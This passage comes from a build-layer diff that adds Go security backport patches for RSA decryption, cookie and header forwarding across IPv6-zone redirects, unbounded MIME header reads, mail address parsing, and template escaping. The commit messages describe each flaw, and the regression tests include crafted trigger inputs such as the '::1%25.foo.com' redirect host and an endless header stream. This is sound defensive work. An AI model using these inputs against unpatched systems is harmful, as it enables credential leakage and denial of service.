+ if priv.N.Sign() == 0 {
+ return nil, ErrDecryption
+ }
+
+- var ir *big.Int
+- if random != nil {
+- randutil.MaybeReadByte(random)
+-
+- // Blinding enabled. Blinding involves multiplying c by r^e.
+- // Then the decryption operation performs (m^e * r^e)^d mod n
+- // which equals mr mod n. The factor of r can then be removed
+- // by multiplying by the multiplicative inverse of r.
+-
+- var r *big.Int
+- ir = new(big.Int)
+- for {
+- r, err = rand.Int(random, priv.N)
+- if err != nil {
+- return
+- }
+- if r.Cmp(bigZero) == 0 {
+- r = bigOne
+- }
+- ok := ir.ModInverse(r, priv.N)
+- if ok != nil {
+- break
+- }
+- }
+- bigE := big.NewInt(int64(priv.E))
+- rpowe := new(big.Int).Exp(r, bigE, priv.N) // N != 0
+- cCopy := new(big.Int).Set(c)
+- cCopy.Mul(cCopy, rpowe)
+- cCopy.Mod(cCopy, priv.N)
+- c = cCopy
+- }
+-
++ // Note that because our private decryption exponents are stored as big.Int,
++ // we potentially leak the exact number of bits of these exponents. This
++ // isn't great, but should be fine.
+ if priv.Precomputed.Dp == nil {
+- m = new(big.Int).Exp(c, priv.D, priv.N)
+- } else {
+- // We have the precalculated values needed for the CRT.
+- m = new(big.Int).Exp(c, priv.Precomputed.Dp, priv.Primes[0])
+- m2 := new(big.Int).Exp(c, priv.Precomputed.Dq, priv.Primes[1])
+- m.Sub(m, m2)
+- if m.Sign() < 0 {
+- m.Add(m, priv.Primes[0])
+- }
+- m.Mul(m, priv.Precomputed.Qinv)
+- m.Mod(m, priv.Primes[0])
+- m.Mul(m, priv.Primes[1])
+- m.Add(m, m2)
+-
+- for i, values := range priv.Precomputed.CRTValues {
+- prime := priv.Primes[2+i]
+- m2.Exp(c, values.Exp, prime)
+- m2.Sub(m2, m)
+- m2.Mul(m2, values.Coeff)
+- m2.Mod(m2, prime)
+- if m2.Sign() < 0 {
+- m2.Add(m2, prime)
+- }
+- m2.Mul(m2, values.R)
+- m.Add(m, m2)
+- }
+- }
+-
+- if ir != nil {
+- // Unblind.
+- m.Mul(m, ir)
+- m.Mod(m, priv.N)
+- }
+-
+- return
++ out := make([]byte, modulusSize(N))
++ return new(nat).exp(c, priv.D.Bytes(), N).fillBytes(out), nil
++ }
++
++ t0 := new(nat)
++ P := modulusFromNat(natFromBig(priv.Primes[0]))
++ Q := modulusFromNat(natFromBig(priv.Primes[1]))
++ // m = c ^ Dp mod p
++ m := new(nat).exp(t0.mod(c, P), priv.Precomputed.Dp.Bytes(), P)
++ // m2 = c ^ Dq mod q
++ m2 := new(nat).exp(t0.mod(c, Q), priv.Precomputed.Dq.Bytes(), Q)
++ // m = m - m2 mod p
++ m.modSub(t0.mod(m2, P), P)
++ // m = m * Qinv mod p
++ m.modMul(natFromBig(priv.Precomputed.Qinv).expandFor(P), P)
++ // m = m * q mod N
++ m.expandFor(N).modMul(t0.mod(Q.nat, N), N)
++ // m = m + m2 mod N
++ m.modAdd(m2.expandFor(N), N)
++
++ for i, values := range priv.Precomputed.CRTValues {
++ p := modulusFromNat(natFromBig(priv.Primes[2+i]))
++ // m2 = c ^ Exp mod p
++ m2.exp(t0.mod(c, p), values.Exp.Bytes(), p)
++ // m2 = m2 - m mod p
++ m2.modSub(t0.mod(m, p), p)
++ // m2 = m2 * Coeff mod p
++ m2.modMul(natFromBig(values.Coeff).expandFor(p), p)
++ // m2 = m2 * R mod N
++ R := natFromBig(values.R).expandFor(N)
++ m2.expandFor(N).modMul(R, N)
++ // m = m + m2 mod N
++ m.modAdd(m2, N)
++ }
++
++ out := make([]byte, modulusSize(N))
++ return m.fillBytes(out), nil
+ }
+
+-func decryptAndCheck(random io.Reader, priv *PrivateKey, c *big.Int) (m *big.Int, err error) {
+- m, err = decrypt(random, priv, c)
++func decryptAndCheck(priv *PrivateKey, ciphertext []byte) (m []byte, err error) {
++ m, err = decrypt(priv, ciphertext)
+ if err != nil {
+ return nil, err
+ }
+
+ // In order to defend against errors in the CRT computation, m^e is
+ // calculated, which should match the original ciphertext.
+- check := encrypt(new(big.Int), &priv.PublicKey, m)
+- if c.Cmp(check) != 0 {
++ check := encrypt(&priv.PublicKey, m)
++ if subtle.ConstantTimeCompare(ciphertext, check) != 1 {
+ return nil, errors.New("rsa: internal error")
+ }
+ return m, nil
+@@ -554,9 +534,7 @@ func decryptAndCheck(random io.Reader, priv *PrivateKey, c *big.Int) (m *big.Int
+ // Encryption and decryption of a given message must use the same hash function
+ // and sha256.New() is a reasonable choice.
+ //
+-// The random parameter, if not nil, is used to blind the private-key operation
+-// and avoid timing side-channel attacks. Blinding is purely internal to this
+-// function – the random data need not match that used when encrypting.
++// The random parameter is legacy and ignored, and it can be nil.
+ //
+ // The label parameter must match the value given when encrypting. See
+ // EncryptOAEP for details.
+@@ -570,9 +548,7 @@ func DecryptOAEP(hash hash.Hash, random io.Reader, priv *PrivateKey, ciphertext
+ return nil, ErrDecryption
+ }
+
+- c := new(big.Int).SetBytes(ciphertext)
+-
+- m, err := decrypt(random, priv, c)
++ em, err := decrypt(priv, ciphertext)
+ if err != nil {
+ return nil, err
+ }
+@@ -581,10 +557,6 @@ func DecryptOAEP(hash hash.Hash, random io.Reader, priv *PrivateKey, ciphertext
+ lHash := hash.Sum(nil)
+ hash.Reset()
+
+- // We probably leak the number of leading zeros.
+- // It's not clear that we can do anything about this.
+- em := m.FillBytes(make([]byte, k))
+-
+ firstByteIsZero := subtle.ConstantTimeByteEq(em[0], 0)
+
+ seed := em[1 : hash.Size()+1]
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45289.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45289.patch
new file mode 100644
index 0000000000..13d3510504
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45289.patch
@@ -0,0 +1,121 @@
+From 20586c0dbe03d144f914155f879fa5ee287591a1 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Thu, 11 Jan 2024 11:31:57 -0800
+Subject: [PATCH] [release-branch.go1.21] net/http, net/http/cookiejar: avoid
+ subdomain matches on IPv6 zones
+
+When deciding whether to forward cookies or sensitive headers
+across a redirect, do not attempt to interpret an IPv6 address
+as a domain name.
+
+Avoids a case where a maliciously-crafted redirect to an
+IPv6 address with a scoped addressing zone could be
+misinterpreted as a within-domain redirect. For example,
+we could interpret "::1%.www.example.com" as a subdomain
+of "www.example.com".
+
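+As an illustrative sketch (not an actual hunk from this change), the new
+guard in isDomainOrSubdomain amounts to:
+
+    // Hosts containing ':' or '%' are never treated as (sub)domains.
+    isDomainOrSubdomain("www.example.com", "example.com")      // true
+    isDomainOrSubdomain("::1%.www.example.com", "example.com") // false
+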
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Fixes CVE-2023-45289
+Fixes #65385
+For #65065
+
+Change-Id: I8f463f59f0e700c8a18733d2b264a8bcb3a19599
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2131938
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2173775
+Reviewed-by: Carlos Amedee <amedee@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/569239
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+TryBot-Bypass: Michael Knyszek <mknyszek@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/20586c0dbe03d144f914155f879fa5ee287591a1]
+CVE: CVE-2023-45289
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/net/http/client.go | 6 ++++++
+ src/net/http/client_test.go | 1 +
+ src/net/http/cookiejar/jar.go | 7 +++++++
+ src/net/http/cookiejar/jar_test.go | 10 ++++++++++
+ 4 files changed, 24 insertions(+)
+
+diff --git a/src/net/http/client.go b/src/net/http/client.go
+index a496f1c..2031834 100644
+--- a/src/net/http/client.go
++++ b/src/net/http/client.go
+@@ -973,6 +973,12 @@ func isDomainOrSubdomain(sub, parent string) bool {
+ if sub == parent {
+ return true
+ }
++ // If sub contains a :, it's probably an IPv6 address (and is definitely not a hostname).
++ // Don't check the suffix in this case, to avoid matching the contents of an IPv6 zone.
++ // For example, "::1%.www.example.com" is not a subdomain of "www.example.com".
++ if strings.ContainsAny(sub, ":%") {
++ return false
++ }
+ // If sub is "foo.example.com" and parent is "example.com",
+ // that means sub must end in "."+parent.
+ // Do it without allocating.
+diff --git a/src/net/http/client_test.go b/src/net/http/client_test.go
+index 2b4f53f..442fe35 100644
+--- a/src/net/http/client_test.go
++++ b/src/net/http/client_test.go
+@@ -1703,6 +1703,7 @@ func TestShouldCopyHeaderOnRedirect(t *testing.T) {
+ {"cookie2", "http://foo.com/", "http://bar.com/", false},
+ {"authorization", "http://foo.com/", "http://bar.com/", false},
+ {"www-authenticate", "http://foo.com/", "http://bar.com/", false},
++ {"authorization", "http://foo.com/", "http://[::1%25.foo.com]/", false},
+
+ // But subdomains should work:
+ {"www-authenticate", "http://foo.com/", "http://foo.com/", true},
+diff --git a/src/net/http/cookiejar/jar.go b/src/net/http/cookiejar/jar.go
+index 9f19917..18cbfc2 100644
+--- a/src/net/http/cookiejar/jar.go
++++ b/src/net/http/cookiejar/jar.go
+@@ -356,6 +356,13 @@ func jarKey(host string, psl PublicSuffixList) string {
+
+ // isIP reports whether host is an IP address.
+ func isIP(host string) bool {
++ if strings.ContainsAny(host, ":%") {
++ // Probable IPv6 address.
++ // Hostnames can't contain : or %, so this is definitely not a valid host.
++ // Treating it as an IP is the more conservative option, and avoids the risk
++ // of interpreting ::1%.www.example.com as a subdomain of www.example.com.
++ return true
++ }
+ return net.ParseIP(host) != nil
+ }
+
+diff --git a/src/net/http/cookiejar/jar_test.go b/src/net/http/cookiejar/jar_test.go
+index 47fb1ab..fd8d40e 100644
+--- a/src/net/http/cookiejar/jar_test.go
++++ b/src/net/http/cookiejar/jar_test.go
+@@ -251,6 +251,7 @@ var isIPTests = map[string]bool{
+ "127.0.0.1": true,
+ "1.2.3.4": true,
+ "2001:4860:0:2001::68": true,
++ "::1%zone": true,
+ "example.com": false,
+ "1.1.1.300": false,
+ "www.foo.bar.net": false,
+@@ -613,6 +614,15 @@ var basicsTests = [...]jarTest{
+ {"http://www.host.test:1234/", "a=1"},
+ },
+ },
++ {
++ "IPv6 zone is not treated as a host.",
++ "https://example.com/",
++ []string{"a=1"},
++ "a=1",
++ []query{
++ {"https://[::1%25.example.com]:80/", ""},
++ },
++ },
+ }
+
+ func TestBasics(t *testing.T) {
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45290.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45290.patch
new file mode 100644
index 0000000000..ddc2f67c96
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45290.patch
@@ -0,0 +1,271 @@
+From bf80213b121074f4ad9b449410a4d13bae5e9be0 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Tue, 16 Jan 2024 15:37:52 -0800
+Subject: [PATCH] [release-branch.go1.21] net/textproto, mime/multipart: avoid
+ unbounded read in MIME header
+
+mime/multipart.Reader.ReadForm allows specifying the maximum amount
+of memory that will be consumed by the form. While this limit is
+correctly applied to the parsed form data structure, it was not
+being applied to individual header lines in a form.
+
+For example, when presented with a form containing a header line
+that never ends, ReadForm will continue to read the line until it
+runs out of memory.
+
+Limit the amount of data consumed when reading a header.
+
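+As an illustrative sketch (not an actual hunk from this change), the new
+limit can be observed as follows, where endlessHeader stands for any
+reader that keeps producing header bytes without ever ending the line:
+
+    r := multipart.NewReader(endlessHeader, "boundary")
+    _, err := r.ReadForm(1 << 20)
+    // err is multipart.ErrMessageTooLarge rather than unbounded memory use
+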
+Fixes CVE-2023-45290
+Fixes #65389
+For #65383
+
+Change-Id: I7f9264d25752009e95f6b2c80e3d76aaf321d658
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2134435
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2173776
+Reviewed-by: Carlos Amedee <amedee@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/569240
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/bf80213b121074f4ad9b449410a4d13bae5e9be0]
+CVE: CVE-2023-45290
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata_test.go | 42 +++++++++++++++++++++++++
+ src/net/textproto/reader.go | 48 ++++++++++++++++++++---------
+ src/net/textproto/reader_test.go | 12 ++++++++
+ 3 files changed, 87 insertions(+), 15 deletions(-)
+
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index c78eeb7..f729da6 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -421,6 +421,48 @@ func TestReadFormLimits(t *testing.T) {
+ }
+ }
+
++func TestReadFormEndlessHeaderLine(t *testing.T) {
++ for _, test := range []struct {
++ name string
++ prefix string
++ }{{
++ name: "name",
++ prefix: "X-",
++ }, {
++ name: "value",
++ prefix: "X-Header: ",
++ }, {
++ name: "continuation",
++ prefix: "X-Header: foo\r\n ",
++ }} {
++ t.Run(test.name, func(t *testing.T) {
++ const eol = "\r\n"
++ s := `--boundary` + eol
++ s += `Content-Disposition: form-data; name="a"` + eol
++ s += `Content-Type: text/plain` + eol
++ s += test.prefix
++ fr := io.MultiReader(
++ strings.NewReader(s),
++ neverendingReader('X'),
++ )
++ r := NewReader(fr, "boundary")
++ _, err := r.ReadForm(1 << 20)
++ if err != ErrMessageTooLarge {
++ t.Fatalf("ReadForm(1 << 20): %v, want ErrMessageTooLarge", err)
++ }
++ })
++ }
++}
++
++type neverendingReader byte
++
++func (r neverendingReader) Read(p []byte) (n int, err error) {
++ for i := range p {
++ p[i] = byte(r)
++ }
++ return len(p), nil
++}
++
+ func BenchmarkReadForm(b *testing.B) {
+ for _, test := range []struct {
+ name string
+diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
+index ad2d777..cea6613 100644
+--- a/src/net/textproto/reader.go
++++ b/src/net/textproto/reader.go
+@@ -17,6 +17,10 @@ import (
+ "sync"
+ )
+
++// TODO: This should be a distinguishable error (ErrMessageTooLarge)
++// to allow mime/multipart to detect it.
++var errMessageTooLarge = errors.New("message too large")
++
+ // A Reader implements convenience methods for reading requests
+ // or responses from a text protocol network connection.
+ type Reader struct {
+@@ -38,13 +42,13 @@ func NewReader(r *bufio.Reader) *Reader {
+ // ReadLine reads a single line from r,
+ // eliding the final \n or \r\n from the returned string.
+ func (r *Reader) ReadLine() (string, error) {
+- line, err := r.readLineSlice()
++ line, err := r.readLineSlice(-1)
+ return string(line), err
+ }
+
+ // ReadLineBytes is like ReadLine but returns a []byte instead of a string.
+ func (r *Reader) ReadLineBytes() ([]byte, error) {
+- line, err := r.readLineSlice()
++ line, err := r.readLineSlice(-1)
+ if line != nil {
+ buf := make([]byte, len(line))
+ copy(buf, line)
+@@ -53,7 +57,10 @@ func (r *Reader) ReadLineBytes() ([]byte, error) {
+ return line, err
+ }
+
+-func (r *Reader) readLineSlice() ([]byte, error) {
++// readLineSlice reads a single line from r,
++// up to lim bytes long (or unlimited if lim is less than 0),
++// eliding the final \r or \r\n from the returned string.
++func (r *Reader) readLineSlice(lim int64) ([]byte, error) {
+ r.closeDot()
+ var line []byte
+ for {
+@@ -61,6 +68,9 @@ func (r *Reader) readLineSlice() ([]byte, error) {
+ if err != nil {
+ return nil, err
+ }
++ if lim >= 0 && int64(len(line))+int64(len(l)) > lim {
++ return nil, errMessageTooLarge
++ }
+ // Avoid the copy if the first call produced a full line.
+ if line == nil && !more {
+ return l, nil
+@@ -93,7 +103,7 @@ func (r *Reader) readLineSlice() ([]byte, error) {
+ // A line consisting of only white space is never continued.
+ //
+ func (r *Reader) ReadContinuedLine() (string, error) {
+- line, err := r.readContinuedLineSlice(noValidation)
++ line, err := r.readContinuedLineSlice(-1, noValidation)
+ return string(line), err
+ }
+
+@@ -114,7 +124,7 @@ func trim(s []byte) []byte {
+ // ReadContinuedLineBytes is like ReadContinuedLine but
+ // returns a []byte instead of a string.
+ func (r *Reader) ReadContinuedLineBytes() ([]byte, error) {
+- line, err := r.readContinuedLineSlice(noValidation)
++ line, err := r.readContinuedLineSlice(-1, noValidation)
+ if line != nil {
+ buf := make([]byte, len(line))
+ copy(buf, line)
+@@ -127,13 +137,14 @@ func (r *Reader) ReadContinuedLineBytes() ([]byte, error) {
+ // returning a byte slice with all lines. The validateFirstLine function
+ // is run on the first read line, and if it returns an error then this
+ // error is returned from readContinuedLineSlice.
+-func (r *Reader) readContinuedLineSlice(validateFirstLine func([]byte) error) ([]byte, error) {
++// It reads up to lim bytes of data (or unlimited if lim is less than 0).
++func (r *Reader) readContinuedLineSlice(lim int64, validateFirstLine func([]byte) error) ([]byte, error) {
+ if validateFirstLine == nil {
+ return nil, fmt.Errorf("missing validateFirstLine func")
+ }
+
+ // Read the first line.
+- line, err := r.readLineSlice()
++ line, err := r.readLineSlice(lim)
+ if err != nil {
+ return nil, err
+ }
+@@ -161,13 +172,21 @@ func (r *Reader) readContinuedLineSlice(validateFirstLine func([]byte) error) ([
+ // copy the slice into buf.
+ r.buf = append(r.buf[:0], trim(line)...)
+
++ if lim < 0 {
++ lim = math.MaxInt64
++ }
++ lim -= int64(len(r.buf))
++
+ // Read continuation lines.
+ for r.skipSpace() > 0 {
+- line, err := r.readLineSlice()
++ r.buf = append(r.buf, ' ')
++ if int64(len(r.buf)) >= lim {
++ return nil, errMessageTooLarge
++ }
++ line, err := r.readLineSlice(lim - int64(len(r.buf)))
+ if err != nil {
+ break
+ }
+- r.buf = append(r.buf, ' ')
+ r.buf = append(r.buf, trim(line)...)
+ }
+ return r.buf, nil
+@@ -512,7 +531,8 @@ func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error)
+
+ // The first line cannot start with a leading space.
+ if buf, err := r.R.Peek(1); err == nil && (buf[0] == ' ' || buf[0] == '\t') {
+- line, err := r.readLineSlice()
++ const errorLimit = 80 // arbitrary limit on how much of the line we'll quote
++ line, err := r.readLineSlice(errorLimit)
+ if err != nil {
+ return m, err
+ }
+@@ -520,7 +540,7 @@ func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error)
+ }
+
+ for {
+- kv, err := r.readContinuedLineSlice(mustHaveFieldNameColon)
++ kv, err := r.readContinuedLineSlice(maxMemory, mustHaveFieldNameColon)
+ if len(kv) == 0 {
+ return m, err
+ }
+@@ -541,7 +561,7 @@ func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error)
+
+ maxHeaders--
+ if maxHeaders < 0 {
+- return nil, errors.New("message too large")
++ return nil, errMessageTooLarge
+ }
+
+ // backport 5c55ac9bf1e5f779220294c843526536605f42ab
+@@ -567,9 +587,7 @@ func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error)
+ }
+ maxMemory -= int64(len(value))
+ if maxMemory < 0 {
+- // TODO: This should be a distinguishable error (ErrMessageTooLarge)
+- // to allow mime/multipart to detect it.
+- return m, errors.New("message too large")
++ return m, errMessageTooLarge
+ }
+ if vv == nil && len(strs) > 0 {
+ // More than likely this will be a single-element key.
+diff --git a/src/net/textproto/reader_test.go b/src/net/textproto/reader_test.go
+index 3ae0de1..db1ed91 100644
+--- a/src/net/textproto/reader_test.go
++++ b/src/net/textproto/reader_test.go
+@@ -34,6 +34,18 @@ func TestReadLine(t *testing.T) {
+ }
+ }
+
++func TestReadLineLongLine(t *testing.T) {
++ line := strings.Repeat("12345", 10000)
++ r := reader(line + "\r\n")
++ s, err := r.ReadLine()
++ if err != nil {
++ t.Fatalf("Line 1: %v", err)
++ }
++ if s != line {
++ t.Fatalf("%v-byte line does not match expected %v-byte line", len(s), len(line))
++ }
++}
++
+ func TestReadContinuedLine(t *testing.T) {
+ r := reader("line1\nline\n 2\nline3\n")
+ s, err := r.ReadContinuedLine()
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2024-24784.patch b/meta/recipes-devtools/go/go-1.14/CVE-2024-24784.patch
new file mode 100644
index 0000000000..e9d9d972b9
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2024-24784.patch
@@ -0,0 +1,205 @@
+From 5330cd225ba54c7dc78c1b46dcdf61a4671a632c Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Wed, 10 Jan 2024 11:02:14 -0800
+Subject: [PATCH] [release-branch.go1.22] net/mail: properly handle special
+ characters in phrase and obs-phrase
+
+Fixes a couple of misalignments with RFC 5322 which introduce
+significant diffs between (mostly) conformant parsers.
+
+This change reverts the changes made in CL50911, which allowed certain
+special RFC 5322 characters to appear unquoted in the "phrase" syntax.
+It is unclear why this change was made in the first place, and created
+a divergence from conformant parsers. In particular this resulted in
+treating comments in display names incorrectly.
+
+Additionally properly handle trailing malformed comments in the group
+syntax.
+
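+As an illustrative sketch (not an actual hunk from this change), a display
+name that starts with a comment now returns a parse error:
+
+    _, err := mail.ParseAddress("(John) Doe <jdoe@machine.example>")
+    // err mentions "missing word in phrase"
+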
+For #65083
+Fixed #65849
+
+Change-Id: I00dddc044c6ae3381154e43236632604c390f672
+Reviewed-on: https://go-review.googlesource.com/c/go/+/555596
+Reviewed-by: Damien Neil <dneil@google.com>
+LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/566215
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5330cd225ba54c7dc78c1b46dcdf61a4671a632c]
+CVE: CVE-2024-24784
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ src/net/mail/message.go | 30 +++++++++++++++------------
+ src/net/mail/message_test.go | 40 ++++++++++++++++++++++++++----------
+ 2 files changed, 46 insertions(+), 24 deletions(-)
+
+diff --git a/src/net/mail/message.go b/src/net/mail/message.go
+index af516fc30f470..fc2a9e46f811b 100644
+--- a/src/net/mail/message.go
++++ b/src/net/mail/message.go
+@@ -280,7 +280,7 @@ func (a *Address) String() string {
+ // Add quotes if needed
+ quoteLocal := false
+ for i, r := range local {
+- if isAtext(r, false, false) {
++ if isAtext(r, false) {
+ continue
+ }
+ if r == '.' {
+@@ -444,7 +444,7 @@ func (p *addrParser) parseAddress(handleGroup bool) ([]*Address, error) {
+ if !p.consume('<') {
+ atext := true
+ for _, r := range displayName {
+- if !isAtext(r, true, false) {
++ if !isAtext(r, true) {
+ atext = false
+ break
+ }
+@@ -479,7 +479,9 @@ func (p *addrParser) consumeGroupList() ([]*Address, error) {
+ // handle empty group.
+ p.skipSpace()
+ if p.consume(';') {
+- p.skipCFWS()
++ if !p.skipCFWS() {
++ return nil, errors.New("mail: misformatted parenthetical comment")
++ }
+ return group, nil
+ }
+
+@@ -496,7 +498,9 @@ func (p *addrParser) consumeGroupList() ([]*Address, error) {
+ return nil, errors.New("mail: misformatted parenthetical comment")
+ }
+ if p.consume(';') {
+- p.skipCFWS()
++ if !p.skipCFWS() {
++ return nil, errors.New("mail: misformatted parenthetical comment")
++ }
+ break
+ }
+ if !p.consume(',') {
+@@ -566,6 +570,12 @@ func (p *addrParser) consumePhrase() (phrase string, err error) {
+ var words []string
+ var isPrevEncoded bool
+ for {
++ // obs-phrase allows CFWS after one word
++ if len(words) > 0 {
++ if !p.skipCFWS() {
++ return "", errors.New("mail: misformatted parenthetical comment")
++ }
++ }
+ // word = atom / quoted-string
+ var word string
+ p.skipSpace()
+@@ -661,7 +671,6 @@ Loop:
+ // If dot is true, consumeAtom parses an RFC 5322 dot-atom instead.
+ // If permissive is true, consumeAtom will not fail on:
+ // - leading/trailing/double dots in the atom (see golang.org/issue/4938)
+-// - special characters (RFC 5322 3.2.3) except '<', '>', ':' and '"' (see golang.org/issue/21018)
+ func (p *addrParser) consumeAtom(dot bool, permissive bool) (atom string, err error) {
+ i := 0
+
+@@ -672,7 +681,7 @@ Loop:
+ case size == 1 && r == utf8.RuneError:
+ return "", fmt.Errorf("mail: invalid utf-8 in address: %q", p.s)
+
+- case size == 0 || !isAtext(r, dot, permissive):
++ case size == 0 || !isAtext(r, dot):
+ break Loop
+
+ default:
+@@ -850,18 +859,13 @@ func (e charsetError) Error() string {
+
+ // isAtext reports whether r is an RFC 5322 atext character.
+ // If dot is true, period is included.
+-// If permissive is true, RFC 5322 3.2.3 specials is included,
+-// except '<', '>', ':' and '"'.
+-func isAtext(r rune, dot, permissive bool) bool {
++func isAtext(r rune, dot bool) bool {
+ switch r {
+ case '.':
+ return dot
+
+ // RFC 5322 3.2.3. specials
+- case '(', ')', '[', ']', ';', '@', '\\', ',':
+- return permissive
+-
+- case '<', '>', '"', ':':
++ case '(', ')', '<', '>', '[', ']', ':', ';', '@', '\\', ',', '"': // RFC 5322 3.2.3. specials
+ return false
+ }
+ return isVchar(r)
+diff --git a/src/net/mail/message_test.go b/src/net/mail/message_test.go
+index 1e1bb4092f659..1f2f62afbf406 100644
+--- a/src/net/mail/message_test.go
++++ b/src/net/mail/message_test.go
+@@ -385,8 +385,11 @@ func TestAddressParsingError(t *testing.T) {
+ 13: {"group not closed: null@example.com", "expected comma"},
+ 14: {"group: first@example.com, second@example.com;", "group with multiple addresses"},
+ 15: {"john.doe", "missing '@' or angle-addr"},
+- 16: {"john.doe@", "no angle-addr"},
++ 16: {"john.doe@", "missing '@' or angle-addr"},
+ 17: {"John Doe@foo.bar", "no angle-addr"},
++ 18: {" group: null@example.com; (asd", "misformatted parenthetical comment"},
++ 19: {" group: ; (asd", "misformatted parenthetical comment"},
++ 20: {`(John) Doe <jdoe@machine.example>`, "missing word in phrase:"},
+ }
+
+ for i, tc := range mustErrTestCases {
+@@ -436,24 +439,19 @@ func TestAddressParsing(t *testing.T) {
+ Address: "john.q.public@example.com",
+ }},
+ },
+- {
+- `"John (middle) Doe" <jdoe@machine.example>`,
+- []*Address{{
+- Name: "John (middle) Doe",
+- Address: "jdoe@machine.example",
+- }},
+- },
++ // Comment in display name
+ {
+ `John (middle) Doe <jdoe@machine.example>`,
+ []*Address{{
+- Name: "John (middle) Doe",
++ Name: "John Doe",
+ Address: "jdoe@machine.example",
+ }},
+ },
++ // Display name is quoted string, so comment is not a comment
+ {
+- `John !@M@! Doe <jdoe@machine.example>`,
++ `"John (middle) Doe" <jdoe@machine.example>`,
+ []*Address{{
+- Name: "John !@M@! Doe",
++ Name: "John (middle) Doe",
+ Address: "jdoe@machine.example",
+ }},
+ },
+@@ -788,6 +786,26 @@ func TestAddressParsing(t *testing.T) {
+ },
+ },
+ },
++ // Comment in group display name
++ {
++ `group (comment:): a@example.com, b@example.com;`,
++ []*Address{
++ {
++ Address: "a@example.com",
++ },
++ {
++ Address: "b@example.com",
++ },
++ },
++ },
++ {
++ `x(:"):"@a.example;("@b.example;`,
++ []*Address{
++ {
++ Address: `@a.example;(@b.example`,
++ },
++ },
++ },
+ }
+ for _, test := range tests {
+ if len(test.exp) == 1 {
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2024-24785.patch b/meta/recipes-devtools/go/go-1.14/CVE-2024-24785.patch
new file mode 100644
index 0000000000..1398a2ca48
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2024-24785.patch
@@ -0,0 +1,197 @@
+From 3643147a29352ca2894fd5d0d2069bc4b4335a7e Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Wed, 14 Feb 2024 17:18:36 -0800
+Subject: [PATCH] [release-branch.go1.21] html/template: escape additional
+ tokens in MarshalJSON errors
+
+Escape "</script" and "<!--" in errors returned from MarshalJSON errors
+when attempting to marshal types in script blocks. This prevents any
+user controlled content from prematurely terminating the script block.
+
+Updates #65697
+Fixes #65968
+
+Change-Id: Icf0e26c54ea7d9c1deed0bff11b6506c99ddef1b
+Reviewed-on: https://go-review.googlesource.com/c/go/+/564196
+LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+(cherry picked from commit ccbc725f2d678255df1bd326fa511a492aa3a0aa)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/567515
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/3643147a29352ca2894fd5d0d2069bc4b4335a7e]
+CVE: CVE-2024-24785
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/html/template/js.go | 22 ++++++++-
+ src/html/template/js_test.go | 96 ++++++++++++++++++++----------------
+ 2 files changed, 74 insertions(+), 44 deletions(-)
+
+diff --git a/src/html/template/js.go b/src/html/template/js.go
+index 35994f0..4d3b25d 100644
+--- a/src/html/template/js.go
++++ b/src/html/template/js.go
+@@ -171,13 +171,31 @@ func jsValEscaper(args ...interface{}) string {
+ // cyclic data. This may be an unacceptable DoS risk.
+ b, err := json.Marshal(a)
+ if err != nil {
+- // Put a space before comment so that if it is flush against
++ // While the standard JSON marshaller does not include user controlled
